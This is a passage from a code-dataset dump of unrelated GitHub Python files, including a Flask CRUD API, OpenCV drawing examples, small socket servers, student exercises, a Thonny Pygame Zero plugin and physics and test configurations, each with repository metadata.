adding a new institution\n            return (\"Institution added successfully and Country Id already existed\")\n        else:\n            return (\"Country Id already exists with a different name\")\n\n### PUT RestAPI to update country details\n@api.route(\"/countries/<country_id>\", methods=['PUT'])\ndef update_country(country_id):\n    country_id = request.json['country_id']\n    country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n    if (len(country_data['data']) != 0): ### checking whether country_id exists or not (exists in this case)\n        db_session.query(Country).filter(Country.country_id == country_id).update({Country.country_name: request.json['country_name'],\n            Country.inserted_date: datetime.datetime.now().date()}, synchronize_session = False)\n        db_session.commit()\n        return (\"Updated Country Successfully\")\n\n    if (len(country_data['data']) == 0): ### checking whether country_id exists or not (does not exist in this case)\n        return (\"Country Id does not exist\")\n\n### PUT RestAPI to update institution details\n@api.route(\"/institutions/<institution_id>\", methods=['PUT'])\ndef update_institution(institution_id):\n    institution_id = request.json['institution_id']\n    institution_data = serialize(db_session.query(Institution).filter(Institution.institution_id == institution_id))\n    if (len(institution_data['data']) != 0): ### checking whether institution_id exists or not (exists in this case)\n        db_session.query(Institution).filter(Institution.institution_id == institution_id).update({Institution.institution_name: request.json['institution_name'],\n            Institution.city_id: request.json['city_id'],\n            Institution.city_name: request.json['city_name'],\n            Institution.country_id: request.json['country_id'],\n            Institution.course_count: request.json['course_count'],\n            Institution.inserted_date: datetime.datetime.now().date()}, synchronize_session = False)\n        db_session.commit()\n        return (\"Updated Institution Successfully\")\n\n    if (len(institution_data['data']) == 0): ### checking whether institution_id exists or not (does not exist in this case)\n        return (\"Institution Id does not exist\")\n\n### DELETE RestAPI to delete a country\n@api.route(\"/countries/<country_id>\", methods = ['DELETE'])\ndef delete_country(country_id):\n    country_data = serialize(db_session.query(Country).filter(Country.country_id == country_id))\n    if (len(country_data['data']) != 0): ### checking whether country_id exists or not (exists in this case)\n        db_session.query(Country).filter(Country.country_id == country_id).delete()\n        db_session.commit()\n        return (\"Deleted Country Successfully\")\n\n    if (len(country_data['data']) == 0): ### checking whether country_id exists or not (does not exist in this case)\n        return (\"Country Id does not exist\")\n\n### DELETE RestAPI to delete an institution\n@api.route(\"/institutions/<institution_id>\", methods = ['DELETE'])\ndef delete_institution(institution_id):\n    institution_data = serialize(db_session.query(Institution).filter(Institution.institution_id == institution_id))\n    if (len(institution_data['data']) != 0): ### checking whether institution_id exists or not (exists in this case)\n        db_session.query(Institution).filter(Institution.institution_id == institution_id).delete()\n        db_session.commit()\n        return (\"Deleted Institution Successfully\")\n\n    if (len(institution_data['data']) == 0): ### checking whether institution_id exists or not (does not exist in this case)\n        return (\"Institution Id does not 
exist\")","repo_name":"shivanshgupta93/WebApplication","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74549180476","text":"import cv2\nimport numpy as np\n\nog_img = cv2.imread(filename=r'images\\bear.jpg')\nimg = og_img.copy()\n\n# cv2.imshow('bear', img)\n# cv2.waitKey(0)\n\nheight, width, _ = img.shape\nprint(f'height: {height}, width: {width}')\n\n#line\ncv2.line(img=img, pt1=(0, 0), pt2=(width, height), color=(0, 255, 0), thickness=5)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#rectangle\ncv2.rectangle(img=img, pt1=(200, 50), pt2=(400, 230), color=(255, 0, 0), thickness=3)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#circle\ncv2.circle(img=img, center=(300, 140), radius=90, color=(0, 0, 255), thickness=3)\ncv2.imshow('bear', mat=img)\ncv2.waitKey(0)\n\n#polygon not close\nimg = og_img.copy()\npts = np.array([[300, 140], [200, 200], [200, 50], [300, 50]], dtype='int32').reshape((-1, 1, 2))\ncv2.polylines(img=img, pts=[pts], isClosed=False, color=(0, 255, 0), thickness=3)\ncv2.imshow('logo', img)\ncv2.waitKey(0)\n\n#polygon close\nimg = og_img.copy()\npts = np.array([[300, 140], [200, 200], [200, 50], [300, 50]], dtype='int32').reshape((-1, 1, 2))\ncv2.polylines(img=img, pts=[pts], isClosed=True, color=(0, 255, 0), thickness=3)\ncv2.imshow('logo', img)\ncv2.waitKey(0)\n\n#text\nimg = og_img.copy()\ncv2.putText(\n img=img,\n text='Python rulez',\n org=(20, 40),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=1.5,\n color=(0, 0, 0),\n thickness=2)\ncv2.imshow('logo', img)\ncv2.waitKey(0)","repo_name":"gorzanskik-ai/computer-vision","sub_path":"01_basics/02_drawing.py","file_name":"02_drawing.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24792336435","text":"#!/usr/bin/python\n#\n# CODE BY: Camila Stefani Nachbar\n# Fatec Carapicuiba - Desenvolvimento de Jogos Digitais\n#\n# Servidor de Mensagens: jogo adivinhe o número\n# Módulo 2 - Redes\n#\n\nimport socket\nimport os\n\ns = socket.socket()\nhost = socket.gethostname()\nport = 12221\ns.bind((host, port))\ns.listen(5)\n\nfrom random import *\nrdn = randint(1, 20)\ntent = 3\n\nprint(\"[Aguardando por conexao...]\")\nc, addr = s.accept()\nos.system(\"cls\")\nprint(\"Conectado com:\", addr)\nwhile tent > 0: \n while True:\n msg = c.recv(1024)\n\n if int(msg) > rdn:\n bytes_text = bytes('Errou, numero é menor!', 'utf-8')\n c.send(bytes_text)\n elif int(msg) < rdn:\n bytes_text = bytes('Errou, numero é maior!', 'utf-8')\n c.send(bytes_text)\n elif int(msg) == rdn: \n bytes_text = bytes('Parabéns! Você acertou!', 'utf-8')\n c.send(bytes_text)\n else:\n bytes_text = bytes('Digite um valor valido', 'utf-8')\n c.send(bytes_text) \n if tent == 0:\n bytes_text = bytes('Que pena! Você perdeu! 
Mais sorte da próxima vez!', 'utf-8')\n c.send(bytes_text)\n tent = tent - 1\nif (msg == 'cls') or (msg == 'CLS'):\n os.system(\"cls\")\n print(\"Conectado com:\", addr)\n q = input(\"[Jogo terminado, reinicie........:] \")\nbytes_text = bytes(q, 'utf-8')\nc.send(bytes_text)\n","repo_name":"CamilaNachbar/jogo-python","sub_path":"servidor/jogo-adivinha.py","file_name":"jogo-adivinha.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29536439261","text":"import os\n\nfrom Base.BaseRunner import ParametrizedTestCase\nfrom PageObject.JslifeApp.JslifeAppBasePage import JslifeAppPage\nPATH = lambda p: os.path.abspath(\n os.path.join(os.path.dirname(__file__), p)\n)\n\nclass JsLifeAppTest(ParametrizedTestCase):\n\n def executor(self,app={}):\n\n page = JslifeAppPage(app)\n page.operate()\n page.checkPoint()\n\n def test_executor(self):\n folder=os.walk(PATH(\"../../yamls\"))\n for root, dirs, files in folder:\n for file in files:\n #if file.startswith(\"test001\"):\n self.driver.launch_app()\n try:\n\n testCasePath=os.path.join(root, file)\n\n app = {\"logTest\": self.logTest, \"launch_app\":self.launch_app,\"driver\": self.driver,\n \"path\": testCasePath,\n \"device\": self.devicesName, \"caseName\":file.split(\".\")[0]}\n self.executor(app)\n except Exception as e:\n print(e)\n continue\n\n\nif __name__ == \"__main__\":\n js=JsLifeAppTest()\n js.test_executor()\n","repo_name":"samesky2016/appium-test","sub_path":"TestCase/JsLifeAppTestCase/JSLifeAppTest.py","file_name":"JSLifeAppTest.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"15962626734","text":"t=int(input())\n\ndef common_deno(x,y):\n for i in range(min(x,y),1,-1):\n if x%i==0 and y%i==0:\n return i\n return 1\n\nfor i in range(t):\n a,b=map(int,input().split())\n common=common_deno(a,b)\n print(common*(a//common)*(b//common))\n","repo_name":"choi2021/thisiscodingtest","sub_path":"수학/1934 최소공배수.py","file_name":"1934 최소공배수.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8359976478","text":"#!/usr/bin/python\n\nimport socket\nimport getopt\nimport sys\nfrom multiprocessing import Lock, Process\n\nCOMMANDS = [\"ABRIR\", \"AGREGAR\", \"LEER\", \"CERRAR\"]\n\n\ndef set_port():\n opts, args = getopt.getopt(sys.argv[1:], 'p:')\n\n return int(opts[0][1])\n\n\ndef init_client(lock, client, address):\n file_name = file = None\n client.send(('Server commands are ' + str(COMMANDS) + '\\n').encode())\n\n while True:\n command = client.recv(256).decode()\n command = command.upper().strip()\n if command == 'ABRIR':\n if file is not None:\n client.send('The file is already open\\n'.encode())\n continue\n client.send('Enter the file name: '.encode())\n file_name = client.recv(256).decode()\n file = open(file_name, 'a')\n client.send('The file was opened\\n'.encode())\n elif command == 'AGREGAR':\n if file is None:\n client.send('A file must be opened first\\n'.encode())\n continue\n client.send('Write something to add to the file:\\n'.encode())\n user_string = client.recv(256).decode()\n lock.acquire()\n file.writelines(user_string)\n file.flush()\n lock.release()\n client.send('The file has been written\\n'.encode())\n elif command == 'LEER':\n if file is None:\n client.send('A file must be opened first\\n'.encode())\n continue\n with 
open(file_name, 'r') as read_fd:\n content = str(read_fd.read()) + '\\n'\n client.send(content.encode())\n elif command == 'CERRAR':\n client.send('Closing the file\\n'.encode())\n if file is not None:\n file.close()\n break\n else:\n client.send(('Enter a valid command: ' + str(COMMANDS) + '\\n').encode())\n print('Client ' + address + ' disconnected')\n client.close()\n sys.exit(0)\n\n\ndef init_server():\n port = set_port()\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(('', port))\n address = socket.gethostbyname(socket.getfqdn())\n print('Server started at ' + address + ' on port ' + str(port))\n\n lock = Lock()\n while True:\n server.listen(10)\n client, connection = server.accept()\n print('Client ' + connection[0] + ' connected')\n process = Process(target=init_client, args=(lock, client, connection[0]))\n process.start()\n\n\ninit_server()\n","repo_name":"juanicastellan0/python-parallel-programming","sub_path":"practices/client_lock.py","file_name":"client_lock.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32795834353","text":"__version__=\"1.0\"\n\nimport numpy as np\nimport sys\n\ndef geni(v, s, max_i):\n quality_1 = 0\n quality_2 = 0\n\n s_star = Solution()\n s_start.quality = sys.maxint\n\n for i in range(1, max_i):\n quality_1 = quality_after_insertion_1(v, i, )\n quality_2 = quality_after_insertion_2()\n\n if quality_1 < quality_2 and quality_1 < s_star.quality:\n s_star = insertion_1(s)\n elif quality_2 < quality_1 and quality_2 < s_star.quality:\n s_star = insertion_2(s)\n\n return s_star\n","repo_name":"wouterkool/attention-learn-to-route","sub_path":"problems/pctsp/salesman/pctsp/algo/geni.py","file_name":"geni.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":906,"dataset":"github-code","pt":"96"} +{"seq_id":"4648279561","text":"import oracledb\nimport config\nimport petl as etl\nimport pandas as pd\nimport numpy as np\noracledb.init_oracle_client(lib_dir=r\"E:\\Downloads\\instantclient_21_6\")\nmin_salary=int(input(\"Enter Minimum Salary =>\"))\nmax_salary=int(input(\"Enter Maximum Salary =>\"))\nsql = 'select empno,salary from empdept where salary> :min_salary and salary< :max_salary'\n\n\ntry:\n # connect to the Oracle Database\n with oracledb.connect(\n user=config.username,\n password=config.password,\n dsn=config.dsn,\n encoding=config.encoding) as connection:\n with connection.cursor() as cursor:\n cursor.execute(sql,{'min_salary':min_salary,'max_salary':max_salary})\n rows=cursor.fetchall()\n table1 = etl.fromdb(connection.cursor, sql,{'min_salary':min_salary,'max_salary':max_salary})\n nr = etl.nrows(table1)\n table2 = etl.look(table1, limit=30)\n print(table2)\nexcept oracledb.Error as error:\n print(error)","repo_name":"MasterChief70/Python-Basics","sub_path":"Sql1/tables/query1/q21_salary_between.py","file_name":"q21_salary_between.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"29927898922","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\n\nprocess = cms.Process(\"flashggCommissioning\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\n# geometry and global 
tag:\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = 'POSTLS170_V5::All'\n\n#**************************************************************\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(500) )\n\ninputlist = FileUtils.loadListFromFile('fileList_ggToH_125_13TeV.txt')\nreadFiles = cms.untracked.vstring( *inputlist)\nprocess.source = cms.Source(\"PoolSource\", fileNames = readFiles)\n\n#**************************************************************\n\nprocess.load(\"flashgg/MicroAOD/flashggPhotons_cfi\")\nprocess.load(\"flashgg/MicroAOD/flashggDiPhotons_cfi\")\nprocess.load(\"flashgg/MicroAOD/flashggTkVtxMap_cfi\")\n\nprocess.commissioning = cms.EDAnalyzer('flashggCommissioning',\n PhotonTag=cms.untracked.InputTag('flashggPhotons'),\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n VertexTag=cms.untracked.InputTag('offlineSlimmedPrimaryVertices')\n)\n\n#**************************************************************\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"tree.root\")\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\", fileName = cms.untracked.string('test_microAOD_ggToH_125_13TeV.root'),\n outputCommands = cms.untracked.vstring(\"drop *\",\"keep *_flashgg*_*_*\",\"keep *_offlineSlimmedPrimaryVertices_*_*\")\n)\n\n\nprocess.p = cms.Path(process.flashggVertexMapUnique*process.flashggVertexMapNonUnique*process.flashggPhotons*process.flashggDiPhotons*process.commissioning)\nprocess.e = cms.EndPath(process.out)\n","repo_name":"cms-analysis/flashgg","sub_path":"Validation/python/flashggCommissioningAnalyzer_cfg.py","file_name":"flashggCommissioningAnalyzer_cfg.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"96"} +{"seq_id":"18393507000","text":"# done!\r\nimport json\r\n\r\n\r\ndef print_student_sentence(name, age, today):\r\n print(\"{} is aged {}. 
He is a passionate learner, and he started a JD program just {}.\".format(name, age, today))\r\n\r\n\r\nprint(\"task1: \", end=\"\")\r\nprint_student_sentence(\"Aleks\", 22, \"today\")\r\n\r\ntransactions_even = [4, 6, 8, 10]\r\n\r\n\r\n# done!\r\ndef store_transactions(transaction_id, transactions):\r\n if transaction_id % 2 == 0:\r\n transactions.append(transaction_id)\r\n return transactions\r\n\r\n\r\nprint(\"task2: \", end=\"\")\r\nprint(store_transactions(2, transactions_even))\r\n\r\nmovie_dictionary = {\r\n \"title\": \"Star Wars\",\r\n \"year\": 1977,\r\n \"actors\": {\r\n \"Darth Vader\": \"Actor1\",\r\n \"Yoda\": \"Actor2\",\r\n \"wages\": {\r\n \"wage1\": 200.25\r\n }\r\n }\r\n}\r\n\r\n\r\n# done!\r\ndef pretty_print_dict(dictionary):\r\n pretty = json.dumps(dictionary, indent=4)\r\n print(pretty)\r\n\r\n\r\nprint(\"task3: \", end=\"\")\r\npretty_print_dict(movie_dictionary)\r\n\r\nsums_array = [5, 11, 6]\r\n\r\n\r\n# done!\r\ndef store_sum(number1, number2, sums):\r\n number = number1 + number2\r\n sums.append(number)\r\n return sums\r\n\r\n\r\nprint(\"task4: \", end=\"\")\r\nprint(store_sum(5, 7, sums_array))\r\n\r\n\r\n# done!\r\ndef get_chars_count(string):\r\n counter = 0\r\n\r\n for i in string:\r\n counter = counter + 1\r\n return counter\r\n\r\n\r\nprint(\"task5: \", end=\"\")\r\nstring_counter = get_chars_count(\"Hello, World!\")\r\nprint(string_counter)\r\n\r\n\r\n# done\r\ndef get_abbreviation(string):\r\n if len(string) > 5:\r\n to_return = \"\"\r\n for i in range(3):\r\n to_return = to_return + string[i]\r\n return to_return\r\n else:\r\n return None\r\n\r\n\r\nprint(\"task6: \", end=\"\")\r\nprint(get_abbreviation(\"faculty\"))\r\n\r\n\r\n# print(get_abbreviation(\"four\"))\r\n\r\n\r\n# done!\r\ndef get_titled_string(sentence):\r\n return sentence.title()\r\n\r\n\r\nprint(\"task7: \", end=\"\")\r\nprint(get_titled_string(\"hello, world!\"))\r\n\r\n\r\n# done!\r\ndef get_number_sum(array, target_sum):\r\n result = []\r\n for i in range(len(array)):\r\n for j in range(i+1, len(array)):\r\n if (array[i] + array[j]) == target_sum:\r\n result = [array[i], array[j]]\r\n return result\r\n return result\r\n\r\n\r\narr = [3, 5, -4, 8, 11, 1, -1, 6]\r\ntarget_sum = 10\r\nprint(\"task8: \", end=\"\")\r\nprint(get_number_sum(arr, target_sum))\r\n\r\n\r\n# done!\r\ndef get_is_valid_subsequence(array, sequence):\r\n seq_index = 0\r\n for i in range(len(array)):\r\n if array[i] == sequence[seq_index]:\r\n seq_index += 1\r\n if seq_index == len(sequence):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\narr = [5, 1, 22, 25, 6, -1, 8, 10]\r\nseq = [1, 6, -1, 10]\r\nprint(\"task9: \", end=\"\")\r\nprint(get_is_valid_subsequence(arr, seq))\r\n\r\n\r\n# done!\r\ndef get_is_palindrome(string):\r\n j = len(string) - 1\r\n counter = 0\r\n\r\n for i in range(0, int(len(string) / 2), 1):\r\n if string[i] == string[j]:\r\n counter = counter + 1\r\n j = j - 1\r\n if counter == int(len(string) / 2):\r\n return True\r\n return False\r\n\r\n\r\nprint(\"task10: \", end=\"\")\r\nprint(get_is_palindrome(\"азобичаммачибоза\"))\r\n\r\n","repo_name":"alexbozhinov/CodeAcademy","sub_path":"Python_homeworks/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6877366884","text":"from collections import Counter\nfrom decimal import Decimal\nfrom typing import List\n\nfrom item import ItemRecord, ProductsStore\n\n\nclass Basket(Counter):\n \"\"\"\n Covers core 
basket functionality.\n\n Basket must do three things, but do well ;)\n 1) update (add/delete) items from it\n 2) get items list (basket content)\n 3) empty itself\n\n Counter is a great \"framework\" for this as it covers all that actions by default :)\n \"\"\"\n def __init__(self, session, *args, **kwargs):\n try:\n self.update(**session['basket'])\n except KeyError:\n super().__init__(*args, **kwargs)\n session['basket'] = self\n\n def _clean(self):\n \"\"\"\n Clean rubbish basket items (with zero or negative amount values) that may\n be produced as a result of Counter's update() / subtract() methods\n :return:\n \"\"\"\n\n crap_items =[]\n for item in self:\n if self[item] <= 0:\n crap_items.append(item)\n for item in crap_items:\n del self[item]\n\n def get_items(self):\n for item_id in self:\n yield item_id, self[item_id]\n\n def update_items(self, items: List[ItemRecord]):\n for item in items:\n self.update({item.id: item.quantity})\n self._clean()\n\n def empty(self):\n self.clear()\n\n def items_sum_price(self):\n \"\"\"Generator that provides all items prices\"\"\"\n ps = ProductsStore()\n total_price = 0\n for item_id in self:\n item_price = ps.get(item_id, 'price')\n if item_price:\n total_price += Decimal(item_price) * self[item_id]\n return Decimal(total_price)\n\n","repo_name":"krembas/basket-recruitment-task","sub_path":"basket.py","file_name":"basket.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23947506968","text":"# import heapq\n# import sys\n# input = sys.stdin.readline\n# n = int(input())\n# list1= []\n# answer = []\n# for i in range(n):\n# list1.append(list(map(int,input().split())))\n# list1.sort(key=lambda x: x[0])\n# target = int(input())\n# start = list1[0][0] \n# end = start + target\n# for i in range(n):\n# if( )\nimport sys\nimport heapq\n\nn = int(sys.stdin.readline())\nroad_info = []\nfor _ in range(n):\n road = list(map(int, sys.stdin.readline().split()))\n road_info.append(road)\nprint(road_info)\nd = int(sys.stdin.readline())\nroads = []\nfor road in road_info:\n house, office = road \n if abs(house - office) <= d:\n road = sorted(road)\n roads.append(road)\nroads.sort(key=lambda x:x[1])\n\nanswer = 0\nheap = []\nfor road in roads:\n if not heap:\n heapq.heappush(heap, road)\n else:\n while heap[0][0] < road[1] - d:\n heapq.heappop(heap)\n if not heap:\n break\n heapq.heappush(heap, road)\n answer = max(answer, len(heap))\n\nprint(answer)","repo_name":"jjung7/jjung7Baekjun","sub_path":"13334.py","file_name":"13334.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15558354703","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nN = 10000\n\n\nU = np.random.rand(N) #random variables\nT = -np.log(U) / 2 # Transform to exponentially distributed RVs\n\n#hist bins, counts\nnbins = 15\nhist, xout = np.histogram(T, bins=nbins)\npdf = hist / N / (xout[1] - xout[0]) # Normalize the histogram\n\n#PDF\ndef theoretical_pdf(t):\n y = np.zeros_like(t) #new empty array like T\n for i in range(len(t)):\n if t[i] < 0:\n y[i] = 0\n else:\n y[i] = 2 * np.exp(-2 * t[i])\n return y\n\nt = np.linspace(min(T), max(T), 100) #PDF line\ny = theoretical_pdf(t)\n\n# Plot\nplt.figure(figsize=(10, 6))\nplt.stairs(xout[:-1], pdf, fill=True, label='Simulated PDF')\nplt.plot(t, y, color='red', label='Theoretical PDF')\nplt.xlabel('T 
(seconds)')\nplt.ylabel('Probability Density')\nplt.title('Exponentially Distributed RV Histogram')\nplt.legend()\nplt.grid(True)\nplt.show()\n","repo_name":"RodrigoBoixo/ee381project2","sub_path":"p3c.py","file_name":"p3c.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"31913490042","text":"# // Game Winner\n# // Two players are playing a game where white or black pieces are represented by a string, colors. The game rules are:\n# // Wendy moves first, players alternate turns\n# // Each move, the player my remove their piece if both adjacent pieces are the same color\n# // Wendy’s pieces are white and Bob’s pieces are black\n# // When a piece is removed, the string is reduced in length by one piece\n# // When a player can no longer move, they have lost the game\n# // Example\n# // colors = “wwwbbbbwww”\n# // Wendy removes idx = 1, colors = “wwbbbbwww”\n# // Bob removes idx = 3, colors = “wwbbbwww”\n# // Wendy removes idx = 6, colors = “wwbbbww”\n# // Bob removes idx = 3, colors = “wwbbww”\n# // Wendy has no move, Bob wins the game.\n# // Determine who wins the game if both play with optimum skill. If Wendy wins, return ‘wendy’ and if Bob wins, return ‘bob’\ndef gameWinner(colors):\n turn = \"wendy\"\n for curr in colors:\n print(curr)\n if(turn is \"wendy\"):\n turn = \"bob\"\n elif(turn is \"bob\"):\n turn = \"wendy\"\n# function gameWinner(colors) {\n\n\n# }\nprint(gameWinner(\"wwwbbbbwww\")) # expected = “bob”\n'''\nwwwbbbbwww\nw_wb_bbww\n\n'''\n","repo_name":"pcricket10/random-code","sub_path":"python_review/game_winner.py","file_name":"game_winner.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"16598728295","text":"# a = input().lower()\r\n# c = list(a)\r\n# print(\"Created list is: \", c)\r\n\r\n#1.2\r\n\r\nstr = input()\r\nchar_list = list(str.lower())\r\ndef freq(char_list):\r\n i = {}\r\n for STR in char_list:\r\n if STR in i:\r\n i[STR] += 1\r\n else:\r\n i[STR] = 1\r\n frequency_list = [(char, frequency) for char, frequency in i.items()]\r\n return frequency_list\r\nresult = freq(char_list)\r\nprint(\"Result: \", result)\r\n\r\n#1.3\r\nstr = input()\r\ninput_list = list(str.lower())\r\nvowels = 'aeiou'\r\nvow = [i for i in input_list if i in vowels]\r\ncons = [i for i in input_list if i.isalpha() and i not in vowels]\r\nsymb = [i for i in input_list if not i.isalpha()]\r\nprint(\"vow =\", vow)\r\nprint(\"cons =\", cons)\r\nprint(\"symb =\", symb)\r\n\r\n# 1.4\r\n# try:\r\n# list_A = input(\"Write a list of numbers separated by commas: \")# if not list_A:\r\n# print(\"Input is empty!!!\")#\r\n# number_list = [int(x) for x in list_A.split(',')]# number_list.sort()\r\n## num = len(number_list)\r\n# q1 = number_list[:num // 4]# q2 = number_list[num // 4:num // 2]\r\n# q3 = number_list[num // 2:3 * num // 4]# q4 = number_list[3 * num // 4:]\r\n## print(\"q1 =\", q1)\r\n# print(\"q2 =\", q2)# print(\"q3 =\", q3)\r\n# print(\"q4 =\", q4)#\r\n# except (ValueError, IndexError):# print(\"Wrong value or sequence out of range!!! 
\")","repo_name":"turnUrmagicon/lab6","sub_path":"task 1.py","file_name":"task 1.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23758235970","text":"import ast\nimport os\nimport sys\nfrom logging import getLogger\n\nfrom thonny.plugins.cpython_backend import MainCPythonBackend, get_backend\n\nlogger = getLogger(__name__)\n\n\ndef augment_ast(root):\n mode = os.environ.get(\"PGZERO_MODE\", \"False\")\n assert mode != \"False\"\n\n warning_prelude = \"WARNING: Pygame Zero mode is turned on (Run → Pygame Zero mode)\"\n try:\n import pgzero # @UnusedImport\n except ImportError:\n if mode == \"True\":\n print(\n warning_prelude\n + \",\\nbut pgzero module is not found. Running program in regular mode.\\n\",\n file=sys.stderr,\n )\n else:\n assert mode == \"auto\"\n\n return\n\n # Check if draw is defined\n for stmt in root.body:\n if isinstance(stmt, ast.FunctionDef) and stmt.name == \"draw\":\n break\n else:\n if mode == \"auto\":\n return\n else:\n print(\n warning_prelude\n + \",\\nbut your program doesn't look like usual Pygame Zero program\\n\"\n + \"(draw function is missing).\\n\",\n file=sys.stderr,\n )\n\n # need more checks in auto mode\n if mode == \"auto\":\n # check that draw method is not called in the code\n for node in ast.walk(root):\n if (\n isinstance(node, ast.Call)\n and isinstance(node.func, ast.Name)\n and node.func.id == \"draw\"\n ):\n return\n\n # prepend \"import pgzrun as __pgzrun\"\n imp = ast.Import([ast.alias(\"pgzrun\", \"__pgzrun\")])\n imp.lineno = 0\n imp.col_offset = 0\n ast.fix_missing_locations(imp)\n imp.tags = {\"ignore\"}\n root.body.insert(0, imp)\n\n # append \"__pgzrun.go()\"\n go = ast.Expr(\n ast.Call(ast.Attribute(ast.Name(\"__pgzrun\", ast.Load()), \"go\", ast.Load()), [], [])\n )\n go.lineno = 1000000\n go.col_offset = 0\n ast.fix_missing_locations(go)\n go.tags = {\"ignore\"}\n root.body.append(go)\n\n\ndef patched_editor_autocomplete(self, cmd):\n logger.debug(\"Starting patched _cmd_editor_autocomplete\")\n # Make extra builtins visible for Jedi\n prefix = \"from pgzero.builtins import *\\n\"\n cmd[\"source\"] = prefix + cmd[\"source\"]\n cmd[\"row\"] = cmd[\"row\"] + 1\n\n result = get_backend()._original_editor_autocomplete(cmd)\n result[\"row\"] = result[\"row\"] - 1\n result[\"source\"] = result[\"source\"][len(prefix) :]\n\n return result\n\n\ndef load_plugin():\n if os.environ.get(\"PGZERO_MODE\", \"False\").lower() == \"false\":\n return\n\n get_backend().add_ast_postprocessor(augment_ast)\n MainCPythonBackend._original_editor_autocomplete = MainCPythonBackend._cmd_editor_autocomplete\n MainCPythonBackend._cmd_editor_autocomplete = patched_editor_autocomplete\n","repo_name":"thonny/thonny","sub_path":"thonny/plugins/backend/pgzero_backend.py","file_name":"pgzero_backend.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":2704,"dataset":"github-code","pt":"96"} +{"seq_id":"18279574845","text":"import sys, os\n\n\npaths = []\npages = []\n\nHTMLs = []\n\ndef start(args):\n paths = os.listdir(\"py-page\")\n for file in paths:\n if(file.endswith(\".py\")):\n dot_pos = len(file) - 3\n pages.append(file[:dot_pos])\n\n sys.path.insert(0, \"py-page\")\n\n for page in pages:\n load = __import__(page)\n\n HTMLs.append(load.get_result(args))\n return 
HTMLs\n","repo_name":"francescoridolfi/neWeb","sub_path":"neWeb_loader.py","file_name":"neWeb_loader.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"8255687867","text":"from PyQt5.QtCore import Qt\nfrom PyQt5.QtTest import QTest\n\nfrom tests.QtTestCase import QtTestCase\nfrom urh import settings\nfrom urh.controller.dialogs.FuzzingDialog import FuzzingDialog\nfrom urh.signalprocessing.Encoding import Encoding\nfrom urh.signalprocessing.Modulator import Modulator\n\n\nclass TestFuzzingDialog(QtTestCase):\n def setUp(self):\n super().setUp()\n self.add_signal_to_form(\"steckdose_anlernen.complex\")\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxNoiseTreshold.setValue(0.06)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxNoiseTreshold.editingFinished.emit()\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxCenterOffset.setValue(-0.0127)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxCenterOffset.editingFinished.emit()\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxSamplesPerSymbol.setValue(100)\n self.form.signal_tab_controller.signal_frames[0].ui.spinBoxSamplesPerSymbol.editingFinished.emit()\n\n self.gframe = self.form.generator_tab_controller\n self.gframe.ui.cbViewType.setCurrentIndex(1) # hex view\n self.gframe.modulators.append(Modulator(\"Prevent Modulation bootstrap when adding first protocol\"))\n self.gframe.refresh_modulators()\n\n # Dewhitening mit SyncByte 0x9a7d9a7d, 